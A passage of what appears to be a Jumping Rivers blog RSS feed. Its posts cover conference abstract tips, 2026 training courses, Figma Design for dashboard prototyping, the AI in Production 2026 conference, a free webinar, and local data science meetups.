&lt;li&gt;specific techniques or tools&lt;/li&gt;
&lt;li&gt;clear lessons learned&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="does-it-fit-the-conference"&gt;Does it fit the conference?&lt;/h3&gt;
&lt;p&gt;Show how your talk connects to the audience and themes. One or two
sentences are enough:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This talk will be useful for people who deploy models into production
and need simple ways to spot drift before it causes problems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Good abstracts are not about impressive credentials or perfect writing.
They are about &lt;strong&gt;clarity&lt;/strong&gt; and &lt;strong&gt;usefulness&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="submit-to-ai-in-production-2026"&gt;Submit to AI in Production 2026&lt;/h2&gt;
&lt;p&gt;Whether it is your first talk or your tenth, we would be happy to read
your abstract for &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production
2026&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;AI in Production focuses on practical work in two areas.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Engineering&lt;/strong&gt;&lt;br&gt;
Building, shipping, maintaining, and scaling AI systems and data
pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Machine Learning&lt;/strong&gt;&lt;br&gt;
Model development, evaluation, responsible use of data, and lessons from
real projects.&lt;/p&gt;
&lt;p&gt;The conference takes place at &lt;strong&gt;The Catalyst in Newcastle city centre&lt;/strong&gt;,
with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Workshops:&lt;/strong&gt; 4 June 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Talks:&lt;/strong&gt; 5 June 2026&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="key-dates"&gt;Key dates&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;9 January:&lt;/strong&gt; Super early bird registration deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;23 January:&lt;/strong&gt; Abstract submission deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;6 March:&lt;/strong&gt; Early bird registration deadline&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Ready to share your work? &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;Submit your abstract or register for
tickets&lt;/a&gt;.&lt;br&gt;
We welcome speakers at all levels.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Start 2026 Ahead of the Curve: Boost Your Career with Jumping Rivers Training</title><link>https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/</link><pubDate>Thu, 27 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ready to make 2026 the year you take your skills to the next level?
Our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;2026 online training courses are now live&lt;/a&gt;, designed to help you
stay ahead of the curve, become more hirable, and gain practical skills that make a real impact.&lt;/p&gt;
&lt;h2 id="january-2026-courses"&gt;January 2026 Courses&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date&lt;/th&gt;
&lt;th style="text-align: left"&gt;Course&lt;/th&gt;
&lt;th style="text-align: left"&gt;Format&lt;/th&gt;
&lt;th style="text-align: left"&gt;Duration&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;12th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Introduction to R&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;6 hours (3.5 hours Day 1, 3.5 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;19th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Introduction to Bayesian Inference using RStan&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;12 hours (6 hours Day 1, 6 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;26th January 2026&lt;/td&gt;
&lt;td style="text-align: left"&gt;Data Wrangling in the Tidyverse&lt;/td&gt;
&lt;td style="text-align: left"&gt;Online&lt;/td&gt;
&lt;td style="text-align: left"&gt;6 hours (3.5 hours Day 1, 3.5 hours Day 2)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="why-attend-jumping-rivers-training"&gt;Why Attend Jumping Rivers Training?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Hands-on, practical training&lt;/strong&gt;: Learn with real-world datasets you can use immediately.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expert instructors&lt;/strong&gt;: Our trainers make complex concepts simple and actionable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Comprehensive resources&lt;/strong&gt;: Course materials, exercises, and ongoing support included.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Certification&lt;/strong&gt;: Receive a Jumping Rivers certificate on completion, demonstrating your achievement to employers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible online format&lt;/strong&gt;: Courses run over two days, 3.5 hours each day, to fit around your schedule.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="additional-perks"&gt;Additional Perks&lt;/h2&gt;
&lt;p&gt;We also run &lt;strong&gt;free webinars&lt;/strong&gt; at Jumping Rivers. By attending, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Get early exposure to new topics in data science and analytics&lt;/li&gt;
&lt;li&gt;Receive up to 20% discount on training courses&lt;/li&gt;
&lt;li&gt;Enjoy up to 20% off Jumping Rivers conferences&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Register for webinars here: &lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Jumping Rivers Webinars&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Don’t wait—start 2026 by investing in yourself and your career. Book your course today: &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;Jumping Rivers Training&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2026-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I Use Figma Design for Dashboard Prototyping?</title><link>https://www.jumpingrivers.com/blog/what-is-figma/</link><pubDate>Thu, 20 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/what-is-figma/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/what-is-figma/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/what-is-figma/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
figure {
background-color: var(--cream);
padding: 1rem;
font-size: 0.8rem;
display: flex;
flex-direction: column;
row-gap: 1rem;
margin-bottom: 1rem;
width: 500px;
max-width: 100%;
border-radius: 0.5rem;
margin-left: auto;
margin-right: auto;
}
figure img {
width: 100%;
}
figcaption {
border-top: 1px solid var(--off-white);
padding-top: 0.25rem;
}
[id="apps"] {
width: 600px;
}
&lt;/style&gt;
&lt;p&gt;Heard of Figma but not sure what it is? Seen Figma but not sure if it&amp;rsquo;s worth learning? Never seen or heard of Figma? If the answer to any of these questions is &amp;ldquo;Yes&amp;rdquo; then this blog post is for you.&lt;/p&gt;
&lt;h2 id="what-are-figma-and-figma-design"&gt;What are Figma and Figma Design?&lt;/h2&gt;
&lt;p&gt;This is a simple question with a somewhat complex answer, not least because there are multiple products falling under the Figma umbrella, made by developers at the company Figma, Inc (often shortened to Figma). At the time of writing, these products are listed on Wikipedia as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Figma&lt;/li&gt;
&lt;li&gt;FigJam&lt;/li&gt;
&lt;li&gt;Figma Slides&lt;/li&gt;
&lt;li&gt;Figma Sites&lt;/li&gt;
&lt;li&gt;Figma Make&lt;/li&gt;
&lt;li&gt;Figma Buzz&lt;/li&gt;
&lt;li&gt;Figma Draw&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You&amp;rsquo;ll see the first of these products is listed simply as &amp;ldquo;Figma&amp;rdquo;. This is the original Figma product that&amp;rsquo;s been around since the mid-2010s. (By contrast, the last four products listed were all launched in 2025.) However, because of the existence of these other Figma products, Figma, Inc has now started to refer to the original product as &amp;ldquo;Figma Design&amp;rdquo; (or in some places just &amp;ldquo;Design&amp;rdquo;). I think this naming is slowly being adopted in general, but you will still find plenty of references to Figma that mean what Figma, Inc now calls Figma Design.&lt;/p&gt;
&lt;figure id="apps"&gt;
&lt;img src="assets/figma-apps.png" aria-labelledby="apps-cap" /&gt;
&lt;figcaption id="apps-cap"&gt;Screenshot of new-file options for a logged-in user at &lt;a href="https://figma.com" target="_blank"&gt;figma.com&lt;/a&gt;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="so-what-is-figma-design"&gt;So What is Figma Design?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://help.figma.com/hc/en-us/articles/14563969806359-What-is-Figma" target="_blank"&gt;According to Figma, Inc&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Figma Design is for people to create, share, and test designs for websites, mobile apps, and other digital products and experiences. It is a popular tool for designers, product managers, writers and developers and helps anyone involved in the design process contribute, give feedback, and make better decisions, faster.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I&amp;rsquo;d simplify that to:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Figma Design is cloud-based collaborative software that allows users to create wireframes, high-fidelity mock-ups and working prototypes of websites and mobile applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This doesn&amp;rsquo;t cover everything Figma Design can do or be used for, as I&amp;rsquo;ll come on to, but I think it covers the main reasons you&amp;rsquo;d choose to learn Figma Design over other design software.&lt;/p&gt;
&lt;h2 id="what-can-i-use-figma-design-for"&gt;What Can I Use Figma Design For?&lt;/h2&gt;
&lt;p&gt;As implied in the previous section, the core offering of Figma Design (in my view, at least) is the ability to quickly make wireframes, high-fidelity designs and interactive prototypes. These can be really helpful when building a complex dashboard.&lt;/p&gt;
&lt;figure id="wireframe"&gt;
&lt;img src="assets/wireframe.svg" aria-labelledby="wireframe-label" /&gt;
&lt;figcaption id="wireframe-label"&gt;Example of a wireframe of the top of the Jumping Rivers home page, built with Figma Design.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure id="proto"&gt;
&lt;video src="assets/proto.mp4" aria-labelledby="proto-label" controls autoplay loop&gt;&lt;/video&gt;
&lt;figcaption id="proto-label"&gt;Screen recording of an interactive prototype built with Figma Design. (The first click at the start of the video is just to move focus to the prototype window. Subsequent clicks are interactions within the prototype.)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;I&amp;rsquo;ve used Figma Design for a number of other things, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;simple vector art&lt;/li&gt;
&lt;li&gt;flow diagrams&lt;/li&gt;
&lt;li&gt;annotating screenshots&lt;/li&gt;
&lt;li&gt;promotional literature intended for print&lt;/li&gt;
&lt;li&gt;very basic image editing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Figma Design is not the &lt;em&gt;best&lt;/em&gt; tool available for any of these tasks. But if it is available to you, you know how to use it and it does the job to a satisfactory level, then it could be the most convenient tool you have at your disposal.&lt;/p&gt;
&lt;figure id="flow"&gt;
&lt;img src="assets/flow-chart.svg" aria-labelledby="flow-label" /&gt;
&lt;figcaption id="flow-label"&gt;Example of a (joke) flow chart, built with Figma Design.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="is-figma-design-free"&gt;Is Figma Design Free?&lt;/h2&gt;
&lt;p&gt;Like a lot of (most?) cloud-based software tools, Figma Design (and the rest of the Figma products) is &lt;a href="https://en.wikipedia.org/wiki/Freemium" target="_blank"&gt;freemium software&lt;/a&gt;. What is and isn&amp;rsquo;t available on the free tier is liable to change so everything that follows in this section should be assumed to be caveated with &amp;ldquo;at the time of writing&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;While you can certainly use Figma Design for free - and, I think, learn how to use most of its tools - the answer to whether you can use it as desired without paying is, unsurprisingly, &amp;ldquo;it depends&amp;rdquo;. If you&amp;rsquo;re part of a team, the free tier strictly limits the number of collaborative files that can be created and your ability to create shared libraries. If you&amp;rsquo;re working independently these things may not be much of an issue, but you won&amp;rsquo;t have access to some other features available in paid tiers like &lt;a href="https://www.figma.com/dev-mode/" target="_blank"&gt;Dev Mode&lt;/a&gt; and video imports.&lt;/p&gt;
&lt;h2 id="what-tools-does-figma-design-give-me"&gt;What Tools Does Figma Design Give Me?&lt;/h2&gt;
&lt;h3 id="tools-in-the-toolbar"&gt;Tools in the Toolbar&lt;/h3&gt;
&lt;p&gt;The things you&amp;rsquo;ll use most in Figma Design, alongside the ubiquitous Move tool, are almost certainly the Frame tool and the Text tool. These may not sound very exciting but you can get a long way using only these. Much of their power comes from the ability to finely customise the look of frames (essentially containers for stuff) and text and to build complex layouts by combining and nesting items you&amp;rsquo;ve created. Frames can also be filled with images, so while there is a separate Image/video tool, you don&amp;rsquo;t actually need to use it to create your high-fidelity mockups. This is illustrated below, where the top of the Jumping Rivers home page has been recreated using only the Frame and Text tools.&lt;/p&gt;
&lt;figure id="hi-fi"&gt;
&lt;img src="assets/hifi.png" aria-labelledby="hifi-label" /&gt;
&lt;figcaption id="hifi-label"&gt;High-fidelity mockup of the top of the Jumping Rivers home page. The only tools from the Figma Design toolbar used to create this were the Frame and Text tools (plus the Move tool).&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;There are various other tools available associated with vector drawing - Line, Rectangle, Ellipse, Pen - as well as sectioning and commenting.&lt;/p&gt;
&lt;figure id="vector"&gt;
&lt;img src="assets/vector-tools.png" aria-labelledby="vector-label" /&gt;
&lt;figcaption id="vector-label"&gt;Screenshot of Figma Design's toolbar with the vector-drawing submenu open.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h3 id="conceptual-tools"&gt;Conceptual Tools&lt;/h3&gt;
&lt;p&gt;Alongside the literal (in a digital sense) tools described above, Figma Design gives you the tools (in a broad, conceptual sense) to perform a number of useful tasks.&lt;/p&gt;
&lt;p&gt;The most significant of these conceptual tools is the ability to create interactive prototypes. In brief, you can select an item in your design, connect it to another item and then define one or more interactions. This is simple in principle and, to start with, fairly simple in practice. For complex designs with many interactions I find it quickly becomes quite messy: Figma, Inc calls the visual depictions of connections you create between elements &amp;ldquo;noodles&amp;rdquo; and I find this apt as it&amp;rsquo;s quite easy to end up with a sort of noodle soup that&amp;rsquo;s hard to decipher. Nevertheless the tools are there and, for simple designs, it&amp;rsquo;s quick to set up and then run a working prototype.&lt;/p&gt;
&lt;figure id="noodles"&gt;
&lt;img src="assets/noodles.png" aria-labelledby="noodles-label" /&gt;
&lt;figcaption id="noodles-label"&gt;Screenshot of a simple four-tab dashboard design. The curved arrows ("noodles") show interactions the user can do: e.g. click on one of the "Flight Delay" buttons to go to the second (top-right) view. Even for this fairly simple prototype, the interlocking noodle pattern can be quite hard to decipher.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;Paying users can use the tools made available in Dev Mode. Because it&amp;rsquo;s not part of the free tier I won&amp;rsquo;t go into details here, but in brief it&amp;rsquo;s a suite of tools that should make it easier to convert design files into code.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also easy to export arbitrary parts of a design as JPEG, PNG, SVG or PDF. There&amp;rsquo;s no native app support for WebP or AVIF export yet, but there are community plugins that offer these.&lt;/p&gt;
&lt;h2 id="so-should-i-design-my-dashboard-with-figma-design"&gt;So, Should I Design My Dashboard with Figma Design?&lt;/h2&gt;
&lt;p&gt;That is, of course, up to you. If your dashboard is fairly simple and you&amp;rsquo;re working on your own, it may be easier to just go straight out and build version 1 of your dashboard with your favourite dashboard-building tool. If you&amp;rsquo;re proficient with a library like Shiny or Dash this can be pretty quick. However, if you&amp;rsquo;re part of a team building a complex app, Figma Design may make the initial stages of development easier. And, if you want to user-test with simple interactive prototypes then it&amp;rsquo;s definitely an option worth considering.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/what-is-figma/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Announcing AI in Production 2026: A New Conference for AI and ML Practitioners</title><link>https://www.jumpingrivers.com/blog/ai-in-production-2026/</link><pubDate>Wed, 19 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ai-in-production-2026/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ai-in-production-2026/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Registration is now open for our first &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production&lt;/a&gt; conference, taking place on &lt;strong&gt;4 and 5 June 2026&lt;/strong&gt; in Newcastle upon Tyne.&lt;/p&gt;
&lt;p&gt;AI in Production is for people who want to see how AI works in day-to-day environments. The event brings together data scientists, engineers, analysts, researchers, and anyone who wants to learn from real projects rather than theory.&lt;/p&gt;
&lt;h2 id="what-to-expect"&gt;What to expect&lt;/h2&gt;
&lt;p&gt;The programme is split into two streams so you can follow what is most relevant to your work.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Engineering Stream&lt;/strong&gt;&lt;br&gt;
Covers deployment, monitoring, scaling, infrastructure, and what it takes to keep AI systems running.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Machine Learning Stream&lt;/strong&gt;&lt;br&gt;
Covers model development, evaluation, responsible use of data, and lessons from applied ML work across different industries.&lt;/p&gt;
&lt;p&gt;Across both days you will hear open discussions about what teams tried, what worked, what failed, and what they learned along the way.&lt;/p&gt;
&lt;h2 id="workshops-on-thursday-4-june"&gt;Workshops on Thursday 4 June&lt;/h2&gt;
&lt;p&gt;The conference opens with a day of hands-on workshops delivered by the Jumping Rivers team. These sessions guide you through practical tasks and give you time to ask questions as you go.&lt;/p&gt;
&lt;p&gt;All tickets include entry to a relaxed drinks reception from 17:00 to 19:30.&lt;/p&gt;
&lt;h2 id="conference-day-on-friday-5-june"&gt;Conference day on Friday 5 June&lt;/h2&gt;
&lt;p&gt;Talks begin at 09:30 and continue until around 16:15. You can move between the two streams or stay with one focus for the day.&lt;/p&gt;
&lt;h2 id="call-for-speakers"&gt;Call for speakers&lt;/h2&gt;
&lt;p&gt;If you would like to speak at &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026&lt;/a&gt;, we would love to hear from you!&lt;/p&gt;
&lt;p&gt;We welcome both new and experienced speakers. You&amp;rsquo;ll need to submit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A talk title&lt;/li&gt;
&lt;li&gt;A short abstract (maximum 250 characters)&lt;/li&gt;
&lt;li&gt;Your preferred talk format
&lt;ul&gt;
&lt;li&gt;Lightning talk (around 6 minutes)&lt;/li&gt;
&lt;li&gt;Standard talk (around 25 minutes)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Whether you are happy for your talk to be recorded&lt;/li&gt;
&lt;li&gt;A link to a page that represents you&lt;br&gt;
(personal site, LinkedIn, GitHub or GitLab, Twitter, Mastodon etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The submission deadline is &lt;strong&gt;23 January 2026&lt;/strong&gt;. &lt;a href="https://jumpingrivers.typeform.com/to/yWVkESrM" rel="external"&gt;Submit your abstract.&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="key-dates"&gt;Key dates&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;9 January:&lt;/strong&gt; Super early bird deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;23 January:&lt;/strong&gt; Abstract submission deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;6 March:&lt;/strong&gt; Early bird deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;28 May:&lt;/strong&gt; General registration deadline&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;4 June:&lt;/strong&gt; Conference begins&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="speakers"&gt;Speakers&lt;/h2&gt;
&lt;p&gt;We are also excited to share our first confirmed speakers.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mac Misiura, Red Hat&lt;/li&gt;
&lt;li&gt;George Stagg, Posit Software&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;More speakers will be announced soon. If you&amp;rsquo;d like to be one of them, &lt;a href="https://jumpingrivers.typeform.com/to/yWVkESrM" rel="external"&gt;you can submit your abstract today&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="tickets"&gt;Tickets&lt;/h2&gt;
&lt;p&gt;You can choose a ticket for the conference only or a combined ticket that includes one workshop. &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869" rel="external"&gt;Learn more and register for the conference&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="planning-your-visit"&gt;Planning your visit&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;The Catalyst&lt;/a&gt; is a short walk from Newcastle Central Station, with regular trains from Edinburgh and London. Newcastle International Airport is around thirty minutes away by Metro.&lt;/p&gt;
&lt;h2 id="sponsorship"&gt;Sponsorship&lt;/h2&gt;
&lt;p&gt;If your organisation would like to support the conference, email &lt;a href="mailto:events@jumpingrivers.com" rel="external"&gt;&lt;strong&gt;events@jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We look forward to welcoming you to Newcastle for two days of focused sessions, open conversations, and practical insight into running AI systems in real settings!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Elevate Your Skills and Boost Your Career – Free Jumping Rivers Webinar on 20th November!</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/</link><pubDate>Mon, 17 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Are you ready to stay ahead in the fast-evolving world of data? Join Jumping Rivers for our free
monthly webinar series designed for data professionals at all levels. In just 55 minutes, you’ll
gain practical insights, sharpen your skills, and tackle real-world challenges in R, Python,
Shiny, and Posit – all from the comfort of your own desk.&lt;/p&gt;
&lt;h2 id="upcoming-webinar---machine-learning-with-python"&gt;Upcoming Webinar - Machine Learning with Python&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Date &amp;amp; Time (GMT):&lt;/strong&gt; 20 November, 13:05&lt;/p&gt;
&lt;h3 id="why-attend"&gt;Why Attend?&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Gain hands-on experience with the latest tools and best practices.&lt;/li&gt;
&lt;li&gt;Make yourself &lt;strong&gt;more hireable&lt;/strong&gt; by boosting your data science skills ahead of 2026.&lt;/li&gt;
&lt;li&gt;Connect with a network of fellow data scientists, engineers, and experts.&lt;/li&gt;
&lt;li&gt;Learn flexibly online with &lt;strong&gt;no cost or commitment&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Unlock &lt;strong&gt;exclusive discounts&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Attend 2 sessions → &lt;strong&gt;20% off&lt;/strong&gt; AI in Production conference tickets.&lt;/li&gt;
&lt;li&gt;Attend more than 2 sessions → &lt;strong&gt;20% off&lt;/strong&gt; any of our high-quality public training courses.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you want to improve coding or explore machine learning, this webinar is your chance
to &lt;strong&gt;stay ahead of the curve&lt;/strong&gt; and grow your career.&lt;/p&gt;
&lt;h3 id="ready-to-join"&gt;Ready to Join?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Register now to secure your spot and start unlocking these benefits.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-ml/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Get Involved in the Data Science Community at our Free Meetups</title><link>https://www.jumpingrivers.com/blog/data-science-meetups-community/</link><pubDate>Thu, 13 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-science-meetups-community/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-science-meetups-community/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-science-meetups-community/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As a data science consultancy, Jumping Rivers are already known for offering help and training to clients in all things data. But did you know that we also organise free, in-person data science meetups?&lt;/p&gt;
&lt;p&gt;In this post we will talk through the typical format and topics at our meetups, along with some details for how you can get involved!&lt;/p&gt;
&lt;h2 id="where-to-find-us"&gt;Where to find us?&lt;/h2&gt;
&lt;p&gt;We organise meetups in Newcastle-Upon-Tyne and Leeds, both of which are advertised on &lt;a href="https://www.meetup.com/" rel="external"&gt;meetup.com&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Science meetups&lt;/a&gt; (NEDS for short) run every three months in Newcastle-Upon-Tyne.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.meetup.com/Leeds-Data-Science-Meetup/" rel="external"&gt;Leeds Data Science meetups&lt;/a&gt; (LeeDS for short) run every two months in (you guessed it) Leeds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Check out the webpages linked above to find out more about these meetups including upcoming and past events.&lt;/p&gt;
&lt;p&gt;Later this month we will be hosting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/309979430/?eventOrigin=group_events_list" rel="external"&gt;20 November NEDS meetup&lt;/a&gt;, featuring a one hour workshop on programming with large language models (LLMs) in R &amp;amp; Python (delivered by our very own Myles).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/events/311099135/?eventOrigin=group_events_list" rel="external"&gt;25 November LeeDS meetup&lt;/a&gt;, featuring talks on LLM coding tools and explainable LLMs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="meetup-format"&gt;Meetup format&lt;/h2&gt;
&lt;p&gt;All of our meetups are run between 6pm and 8pm. The first half hour typically involves casual networking while enjoying some pizza and soft drinks.&lt;/p&gt;
&lt;p&gt;We then have one or two talks from local data science experts. Our previous speakers have come from a wide range of industries including consultancy, government, banking and utilities. Typical talk topics include LLMs, communication in data science, forecasting demand in public health, code review best practices, and setting up machine learning pipelines on platforms such as Databricks and AWS.&lt;/p&gt;
&lt;p&gt;The meetup host will also provide announcements about internships, job opportunities and data science events taking place locally. Between the announcements, networking and talks, our meetups are a great place to make friends and connections within the data science community, whether you&amp;rsquo;re a student looking to get into data science or a seasoned professional.&lt;/p&gt;
